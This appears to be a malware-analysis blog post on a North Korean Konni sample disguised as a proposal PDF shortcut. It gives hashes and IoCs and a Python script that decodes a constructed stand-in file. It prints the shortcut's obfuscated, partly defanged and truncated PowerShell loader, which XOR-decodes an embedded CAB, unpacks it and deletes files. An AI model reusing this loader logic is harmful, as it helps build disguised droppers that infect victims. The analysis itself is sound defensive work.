North Korean Konni malware disguised as a proposal: 제안서 (2025.4.11)
Today we will look at malware made by North Korea's Konni group, which as always disguises itself as a proposal (제안서). First, the hash values are as follows.
File name: 제안서.pdf.lnk
Size: 5 MB
MD5: 777b6a02f7a44582c40ddadb82e60ddb
SHA-1: 6af737ebc782825ebeb7dba389770a843811aff4
SHA-256: 401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
Those are the hashes. Just from looking at them, my personal impression is that something is embedded inside.
First, let's look at the malware itself.
Inside the malware
StringData
{
namestring: pdf File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Window(s)Powershell\*(.)exe ^
| findstr /i rshell(.)exe') do (if e(x)ist "%f" (%f "func(t)ion sister{pa(r)am($title); <#
obv(i)ously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#
>return $mystery;};function tre(n)d{param($suppose);<#fully odds#> [System.IO.File]::Delete
($s(u)ppose);};function stir{param($league,$mirror,$wi(n)ner,$policy,$basket);<#sorr(y) lic
ense#> $knee=New-Object System.IO.FileStream(<#organi(z)ation psychological#>$league,<#fie
ld region#>[System.IO.FileMode]::Op(e)n,<#lots heavy#>[System.IO.FileAccess]::Read);<#grav
e rely#> $knee.Seek(<#pitch m(o)nitor#>$mirror,[(S)ystem.IO.SeekOrigin]::Begin);<#glass st
ruggle#> $observe=$winner*0x01;<#(c)ase full#> $model=New-Object byte[] <#those find#>$win
ner; <#highlight receive#> $smooth=New-Objec(t) byte[] <#also pl(a)yer#>$observe; <#expert
r(o)ugh#>$knee.Read(<#feeling an(y)where#>$smooth,0,<#abandon darkness#>$observe); $knee.C
lose();$fear=0;while($fear -l(t) $winner){<#motor e(x)ternal#>$model[$fear]=$smooth[$fear*
0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secu(r)e#> $model -En
(c)oding <#pl(a)tform spa(c)e#> Byte;};fun(c)tion room{param($a(c)quire, $mainly);<#str(e)
ngthen for(t)une#> exp(a)nd $acqui(r)e <#b(o)dy animal#> -F:* $mainly;};functio(n) would{$
(b)eauty = $env:pub(l)ic<#component slide#> + '\' +<#aud(i)ence attempt#> 'do'+'cum'(+)'en
'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence
gr(o)und#>$shot = Split-Pat(h) $regulation;<#extreme jury#> return $shot;};function resear
cher{return Get-Location;};functio(n) reality{<#variation choice#>return $env:Temp;};funct
ion suicide{$forth …
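The stir function in the command line above reads $winner bytes starting at offset $mirror from the file $league, XORs every byte with the single-byte key $policy and writes the result to $basket; room then unpacks that output with expand -F:*, which points to a CAB archive, and sister strips the last four characters (the .lnk extension) from a name. The following Python script is an analyst's aid added here, not code from the original post or from the sample: it reimplements that carving step offline and brute-forces the offset/key pair of a XOR-encoded CAB header. The buffer SAMPLE_LNK, its offset 64 and key 0x5A are constructed placeholders; the real values must be taken from the actual sample.

```python
import struct

CAB_MAGIC = b"MSCF"  # magic of a Microsoft Cabinet file, which `expand -F:*` unpacks


def xor_carve(data: bytes, offset: int, length: int, key: int) -> bytes:
    """Mirror of the sample's `stir`: take `length` bytes at `offset`
    ($winner / $mirror) and XOR each with the single-byte key ($policy)."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    if offset < 0 or length < 0 or offset + length > len(data):
        raise ValueError("carve range lies outside the file")
    return bytes(b ^ key for b in data[offset:offset + length])


def strip_extension(name: str) -> str:
    """Mirror of `sister`: drop the last four characters, e.g. '.lnk'."""
    return name[:-4]


def find_xor_cab(data: bytes) -> list:
    """Return every (offset, key) at which a single-byte-XOR-encoded CAB
    header ('MSCF') occurs, trying all 256 keys over the whole buffer."""
    hits = []
    for key in range(0x100):
        needle = bytes(b ^ key for b in CAB_MAGIC)
        pos = data.find(needle)
        while pos != -1:
            hits.append((pos, key))
            pos = data.find(needle, pos + 1)
    return hits


# Constructed stand-in for the .lnk (NOT the real sample): a fake 64-byte LNK
# header followed by a small CAB fragment XOR-encoded with key 0x5A.
SAMPLE_KEY = 0x5A
SAMPLE_OFFSET = 64
_cab_plain = CAB_MAGIC + b"\x00" * 4 + struct.pack("<I", 120) + b"PAYLOAD.DAT\x00"
SAMPLE_LNK = (b"L\x00\x00\x00" + b"\x01\x14\x02\x00" + b"\x00" * 56
              + bytes(b ^ SAMPLE_KEY for b in _cab_plain))


def carve_sample() -> bytes:
    """Locate the hidden CAB in SAMPLE_LNK the way stir would extract it."""
    offset, key = find_xor_cab(SAMPLE_LNK)[0]
    return xor_carve(SAMPLE_LNK, offset, len(SAMPLE_LNK) - offset, key)


if __name__ == "__main__":
    print(find_xor_cab(SAMPLE_LNK), carve_sample()[:4])
```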
IoC
6af737ebc782825ebeb7dba389770a843811aff4
401f5a93a9496262fc83ea4cf557e4e9c15e4d2befacf475beba897986752d88
777b6a02f7a44582c40ddadb82e60ddb